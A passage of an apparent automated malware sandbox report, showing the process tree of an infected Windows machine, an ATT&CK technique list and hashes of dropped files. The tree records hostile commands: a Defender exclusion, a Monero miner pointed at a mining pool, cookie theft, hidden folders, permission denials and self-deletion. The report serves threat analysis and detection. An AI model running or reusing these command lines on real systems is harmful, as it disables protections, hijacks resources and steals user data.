"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1772.13.825188846\1752620932" -childID 2 -isForBrowser -prefsHandle 2656 -prefMapHandle 2652 -prefsLen 7392 -prefMapSize 219622 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1772 "\\.\pipe\gecko-crash-server-pipe.1772" 2668 tab
6⤵
PID:3592

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1772.20.1909860475\1203994542" -childID 3 -isForBrowser -prefsHandle 3320 -prefMapHandle 3316 -prefsLen 8306 -prefMapSize 219622 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1772 "\\.\pipe\gecko-crash-server-pipe.1772" 3332 tab
6⤵
PID:4020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
4⤵
PID:1620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7feee0a4f50,0x7feee0a4f60,0x7feee0a4f70
5⤵
PID:3796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1100,3291339847111865539,6778945544125964710,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1104 /prefetch:2
5⤵
PID:1320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1100,3291339847111865539,6778945544125964710,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1660 /prefetch:8
5⤵
PID:3408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1100,3291339847111865539,6778945544125964710,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1644 /prefetch:8
5⤵
PID:2812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1100,3291339847111865539,6778945544125964710,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1
5⤵
PID:2628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1100,3291339847111865539,6778945544125964710,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1
5⤵
PID:3772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1100,3291339847111865539,6778945544125964710,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1
5⤵
PID:1864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1100,3291339847111865539,6778945544125964710,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2108 /prefetch:1
5⤵
PID:3916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1100,3291339847111865539,6778945544125964710,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2080 /prefetch:1
5⤵
PID:3956

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
5⤵
PID:3456

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13faea890,0x13faea8a0,0x13faea8b0
6⤵
PID:1420

C:\Users\Admin\Documents\PenEJEH0A6xi5OAUR35AaDEO.exe
"C:\Users\Admin\Documents\PenEJEH0A6xi5OAUR35AaDEO.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Users\Admin\AppData\Roaming\2314402.exe
"C:\Users\Admin\AppData\Roaming\2314402.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Users\Admin\AppData\Roaming\3521828.exe
"C:\Users\Admin\AppData\Roaming\3521828.exe"
3⤵
- Executes dropped EXE
PID:2460

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2460 -s 1792
4⤵
- Program crash
PID:3864

C:\Users\Admin\Documents\LmZNldMKHYtuUoYYHzPIp7h3.exe
"C:\Users\Admin\Documents\LmZNldMKHYtuUoYYHzPIp7h3.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Users\Admin\AppData\Roaming\8360630.exe
"C:\Users\Admin\AppData\Roaming\8360630.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Users\Admin\AppData\Roaming\2797771.exe
"C:\Users\Admin\AppData\Roaming\2797771.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2316 -s 1648
4⤵
- Program crash
PID:4064

C:\Users\Admin\Documents\5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
"C:\Users\Admin\Documents\5nmMrSQ7DIeZiD_mvJ9tb8nC.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Users\Admin\AppData\Local\Temp\8e2a5590-eeb9-4338-a816-9932a0b01d4a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\8e2a5590-eeb9-4338-a816-9932a0b01d4a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8e2a5590-eeb9-4338-a816-9932a0b01d4a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Users\Admin\AppData\Local\Temp\8e2a5590-eeb9-4338-a816-9932a0b01d4a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\8e2a5590-eeb9-4338-a816-9932a0b01d4a\AdvancedRun.exe" /SpecialRun 4101d8 3064
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\5nmMrSQ7DIeZiD_mvJ9tb8nC.exe" -Force
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Users\Admin\Documents\5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
"C:\Users\Admin\Documents\5nmMrSQ7DIeZiD_mvJ9tb8nC.exe"
3⤵
PID:328

C:\Users\Admin\AppData\Local\Temp\winsetupcom.exe
"C:\Users\Admin\AppData\Local\Temp\winsetupcom.exe"
4⤵
PID:3052

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.minexmr.com:4444 -u 44iQQ1yP3JMbnSdzoY3GzYUUfESrEGEfKakyhxt1FqjfcktWxXkhaGjEs96Y7jJfnEeHa37h4Cjf6cQgA8GzAaGnGPGgkxR -p x -k -v=0 --donate-level=1 -t 1
5⤵
PID:2892

C:\Users\Admin\Documents\exEFL08esRh1mnTiUjUFeDXG.exe
"C:\Users\Admin\Documents\exEFL08esRh1mnTiUjUFeDXG.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2120

C:\Users\Admin\AppData\Local\Temp\is-9A66M.tmp\exEFL08esRh1mnTiUjUFeDXG.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9A66M.tmp\exEFL08esRh1mnTiUjUFeDXG.tmp" /SL5="$20166,138429,56832,C:\Users\Admin\Documents\exEFL08esRh1mnTiUjUFeDXG.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2164

C:\Users\Admin\Documents\aRt8AobJPO4HynqoCvWpW1oE.exe
"C:\Users\Admin\Documents\aRt8AobJPO4HynqoCvWpW1oE.exe"
2⤵
PID:2288

C:\Users\Admin\Documents\aRt8AobJPO4HynqoCvWpW1oE.exe
C:\Users\Admin\Documents\aRt8AobJPO4HynqoCvWpW1oE.exe
3⤵
PID:1060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 868
4⤵
- Program crash
PID:3864

C:\Users\Admin\Documents\H3m7I4Piy4XRc9gztBmFEilM.exe
"C:\Users\Admin\Documents\H3m7I4Piy4XRc9gztBmFEilM.exe"
2⤵
- Executes dropped EXE
PID:2276

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\tetracom.vbs" /f=CREATE_NO_WINDOW install.cmd
3⤵
PID:2632

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\NSpack\updIns\44t.bat" "
4⤵
- Loads dropped DLL
PID:2792

C:\NSpack\updIns\Sgsmmodul.com
"Sgsmmodul.com" e -pEktfsdu78s8f87Ap8pHr6Mqaq9SQ mit.rar
5⤵
- Executes dropped EXE
PID:2204

C:\Windows\SysWOW64\timeout.exe
timeout 6
5⤵
- Delays execution with timeout.exe
PID:868

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\sevenup.vbs"
5⤵
PID:2876

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\NSpack\updIns\gg4359.bat" "
6⤵
PID:2100

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\NSpack\updIns"
7⤵
- Views/modifies file attributes
PID:1552

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:2852

C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
7⤵
PID:1712

C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
8⤵
PID:1980

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
8⤵
- Delays execution with timeout.exe
PID:3576

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
7⤵
- Kills process with taskkill
PID:2852

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
7⤵
- Kills process with taskkill
PID:3196

C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\NSpack\updIns"
7⤵
- Views/modifies file attributes
PID:3388

C:\Windows\SysWOW64\timeout.exe
timeout 4
7⤵
- Delays execution with timeout.exe
PID:3408

C:\Windows\SysWOW64\timeout.exe
timeout 8
5⤵
- Delays execution with timeout.exe
PID:2324

C:\Users\Admin\Documents\_pHSZc3WXEPknSDDq6TlcA30.exe
"C:\Users\Admin\Documents\_pHSZc3WXEPknSDDq6TlcA30.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\Users\Admin\Documents\_pHSZc3WXEPknSDDq6TlcA30.exe
C:\Users\Admin\Documents\_pHSZc3WXEPknSDDq6TlcA30.exe
3⤵
PID:2116

C:\Users\Admin\Documents\LWIEoUgdNGDeqUec96ZlCsNI.exe
"C:\Users\Admin\Documents\LWIEoUgdNGDeqUec96ZlCsNI.exe"
2⤵
- Executes dropped EXE
PID:2224

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\LWIEOU~1.TMP,S C:\Users\Admin\DOCUME~1\LWIEOU~1.EXE
3⤵
- Loads dropped DLL
PID:2548

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\LWIEOU~1.TMP,LgYoYjhoTg==
4⤵
PID:3380

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 29733
5⤵
PID:3512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp4FD5.tmp.ps1"
5⤵
PID:3872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp4462.tmp.ps1"
5⤵
PID:2840

C:\Windows\SysWOW64\nslookup.exe
"C:\Windows\system32\nslookup.exe" -type=any localhost
6⤵
PID:3400

C:\Windows\SysWOW64\schtasks.exe
schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
5⤵
PID:2992

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
5⤵
PID:1932

C:\Users\Admin\Documents\DFFsRBLXKx3YFMKw15Lx4HtJ.exe
"C:\Users\Admin\Documents\DFFsRBLXKx3YFMKw15Lx4HtJ.exe"
2⤵
- Executes dropped EXE
PID:520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{4CkR-fbNNm-hvm8-Vowq9}\36130135786.exe"
3⤵
PID:3516

C:\Users\Admin\AppData\Local\Temp\{4CkR-fbNNm-hvm8-Vowq9}\36130135786.exe
"C:\Users\Admin\AppData\Local\Temp\{4CkR-fbNNm-hvm8-Vowq9}\36130135786.exe"
4⤵
PID:3572

C:\Users\Admin\AppData\Local\Temp\{4CkR-fbNNm-hvm8-Vowq9}\36130135786.exe
C:\Users\Admin\AppData\Local\Temp\{4CkR-fbNNm-hvm8-Vowq9}\36130135786.exe
5⤵
PID:3076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "DFFsRBLXKx3YFMKw15Lx4HtJ.exe" /f & erase "C:\Users\Admin\Documents\DFFsRBLXKx3YFMKw15Lx4HtJ.exe" & exit
3⤵
PID:2016

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "DFFsRBLXKx3YFMKw15Lx4HtJ.exe" /f
4⤵
- Kills process with taskkill
PID:3248

C:\Users\Admin\Documents\gqy6LfOIXkqH51iYnrZGV3Eo.exe
"C:\Users\Admin\Documents\gqy6LfOIXkqH51iYnrZGV3Eo.exe"
2⤵
- Executes dropped EXE
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 892
3⤵
- Program crash
PID:3832

C:\Users\Admin\Documents\raYFEiiE31PUMm3nMxTElHSK.exe
"C:\Users\Admin\Documents\raYFEiiE31PUMm3nMxTElHSK.exe"
2⤵
- Executes dropped EXE
PID:2300

C:\Users\Admin\Documents\xGlL27MolKeBr2BX4cQjWF8d.exe
"C:\Users\Admin\Documents\xGlL27MolKeBr2BX4cQjWF8d.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:2608

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
- Executes dropped EXE
PID:2556

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2212

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
- Executes dropped EXE
PID:2788

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
- Executes dropped EXE
PID:2724

C:\Users\Admin\Documents\veMZca_7cTG2JBC_hpaLLzxx.exe
"C:\Users\Admin\Documents\veMZca_7cTG2JBC_hpaLLzxx.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2492

C:\Users\Admin\AppData\Local\Temp\9335430559.exe
"C:\Users\Admin\AppData\Local\Temp\9335430559.exe"
1⤵
- Executes dropped EXE
PID:2588

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9335430559.exe"
2⤵
PID:1712

C:\Windows\SysWOW64\timeout.exe
timeout 7
1⤵
- Delays execution with timeout.exe
PID:2884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 184
1⤵
- Program crash
PID:2196

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:4060

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1113147364-1590532814-1799502077371730871100322337619741501981569718642-445171771"
1⤵
- Executes dropped EXE
PID:2288

C:\Users\Admin\AppData\Local\Temp\3E77.exe
C:\Users\Admin\AppData\Local\Temp\3E77.exe
1⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\3E77.exe
C:\Users\Admin\AppData\Local\Temp\3E77.exe
2⤵
PID:2512

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:2240

C:\Users\Admin\AppData\Local\Temp\3E77.exe
"C:\Users\Admin\AppData\Local\Temp\3E77.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:2500

C:\Users\Admin\AppData\Local\Temp\3E77.exe
"C:\Users\Admin\AppData\Local\Temp\3E77.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:3516

C:\Users\Admin\AppData\Local\Temp\35E0.exe
C:\Users\Admin\AppData\Local\Temp\35E0.exe
1⤵
PID:2684

C:\Windows\system32\taskeng.exe
taskeng.exe {B677572E-F59E-4915-8A9D-9FADFBDD5529} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:2780

C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe
C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe --Task
2⤵
PID:788

C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe
C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe --Task
3⤵
PID:3224

C:\Users\Admin\AppData\Roaming\rbshgvi
C:\Users\Admin\AppData\Roaming\rbshgvi
2⤵
PID:868

C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe
C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe --Task
2⤵
PID:3320

C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe
C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe --Task
3⤵
PID:1820

C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe
C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe --Task
2⤵
PID:2928

C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe
C:\Users\Admin\AppData\Local\bd2d0343-f49d-439c-a87e-f25bd2ac0cd7\3E77.exe --Task
3⤵
PID:3032

C:\Users\Admin\AppData\Roaming\rbshgvi
C:\Users\Admin\AppData\Roaming\rbshgvi
2⤵
PID:2404

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Executes dropped EXE
PID:328

C:\Users\Admin\AppData\Local\Temp\C6DA.exe
C:\Users\Admin\AppData\Local\Temp\C6DA.exe
1⤵
PID:2960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Hidden Files and Directories

T1158

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe
MD5
8ba11d0fafc5b4d9d27d968999f27c54

SHA1
52295ff966014347823f80f3f508c725b151eb1b

SHA256
9e4aa9c24018878c94ae50c7d0933d3bf3949b851774fd4dd9c9de1e6d6ef4a5

SHA512
c1d5090b2d23a2e4aa68f050993ed90c33ac81e9020be66ec9f64ef45ad444d5b350eb2de37f868d8d70cc9977a7e225b12239a5f538ede2df67df071029299c

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
8ba11d0fafc5b4d9d27d968999f27c54

SHA1
52295ff966014347823f80f3f508c725b151eb1b

SHA256
9e4aa9c24018878c94ae50c7d0933d3bf3949b851774fd4dd9c9de1e6d6ef4a5

SHA512
c1d5090b2d23a2e4aa68f050993ed90c33ac81e9020be66ec9f64ef45ad444d5b350eb2de37f868d8d70cc9977a7e225b12239a5f538ede2df67df071029299c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\45F18AFDDEF3027FDED823F4CE1F46E7
MD5
8c4ce5c11deecba74555c20383d1493f

SHA1
40477e6a558ffcb4fb89ef9a0daf0c334bb4543b

SHA256
62206657da68a4f0358b7aa54d9a0c81f91866452aeee0e9dd5661671352922f

SHA512
5e6037c1fdceeaa8c06770cd77c6e52480dd015be14624e7d46f4c7f18158018436814e85f48021aa3b8622ec6dbabdcf80fba033fc30390ba7257c404b59c2b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4
MD5
452010df5190805ecce2e9f404d43048

SHA1
79989476840ec53e2c97f2e81697223d782c8bae

SHA256
b5a129dc56ea03af0880964265b4537cf70fe00212ab46d2ffb0931434d3cc90

SHA512
5c2cd2331ff25dfc248e9f7974a1c8bfc02e31c6de5ce83fc6d59aa44c89f4d5a713cdb3419eb37380e501d55574bd7ca252e30ffaa13b58c0cc9e6ef58c0d4b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
2902de11e30dcc620b184e3bb0f0c1cb

SHA1
5d11d14a2558801a2688dc2d6dfad39ac294f222

SHA256
e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

SHA512
efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
602a857e070f1f39e8c762e777d2cde1

SHA1
39622df9bdeadf7a9a26f39f56cb561a30214481

SHA256
1c6f677fa0bd3326f9e3fce22dd915085ff17eba5c9af819004e05153a258c56

SHA512
20353e07e9909bfa365f1486900c20185847f93f4149e5940faa63e6031469f17b3708a651d6efdf4bb71bf1d05e2ffcb28874f24be72fb7404f087fa891300e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\45F18AFDDEF3027FDED823F4CE1F46E7
MD5
991a02de1302e1a90070e81adc0086ac

SHA1
41db07aa98f14c7f1d61510be2d03e2d53199173

SHA256
028f92b952f1e500a7ed8ea4ad9b9152a0148f31f9c99efd315a19a8b8bd9d96

SHA512
786e6278974526ae3a3304b6191a43a8c9d104adbd7dbe1e840356d7212ba005edfada1727dffb3aa53ead239847fa6abbbe9db1491f4be034ea7d30c4961e6d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4
MD5
a49fa6173f8698ceb3595e80cecb5d31

SHA1
0f90b05165f3185a08346262c132aca7719fe2c9

SHA256
28da99a231aab97cc47246580a2f397fe2cf187137c6fcc5fa1cf7007018fc7e

SHA512
540d54331eb1dfd71117e2ae287c406b22a7f9d2e67504e332c302263d7fcc366d19594d1d753a0c6aa8a3ac264559a5344970348f0059e353182f5f16b5646a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
951b8046995a3df7fb25395517d4b476

SHA1
1c723ffdf6e6a67455a48b0fb7a0aafaa718d743

SHA256
f1c9c4930a875a5795270c0fd9c8f497ac5e027cb8f4b0bfd4512b61f2352014

SHA512
c1731dba064b1b4de5ac09a9afad8b04eaf8327d0b90720eb6fbd13d0703a03022c243574b79464755aa96255f9e37778ccef51f4607e3200c1e6b565f8c24c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-9A66M.tmp\exEFL08esRh1mnTiUjUFeDXG.tmp
MD5
ffcf263a020aa7794015af0edee5df0b

SHA1
bce1eb5f0efb2c83f416b1782ea07c776666fdab

SHA256
1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

SHA512
49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

Download Submit
C:\Users\Admin\AppData\Roaming\2797771.exe
MD5
faa4540e9de679f1ccebd8919086707b

SHA1
244b5ca95e41f263e8357bb9ca5343623f07afe3

SHA256
c1dd8fb190e95d8530a42bec831fcffbfdad0b6091d79008dc6828ef1587b44e

SHA512
65f0d2baf3a3db9c77ed4607978e1ddae1513b60b1678fcab08bde0e1417f8381d62be2c546c9c674d3206fd5711e7482286831be93ccd8fd0abd137b2cab9ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk
MD5
483feb61a4f78521d39ae401e531d3e0

SHA1
69e6804669c2889202596ee58a77ccc66f51005e

SHA256
e68a36ce144a34c7a5e88cd94d49f358061d4eb6c5eee37a31ce388f946e19e9

SHA512
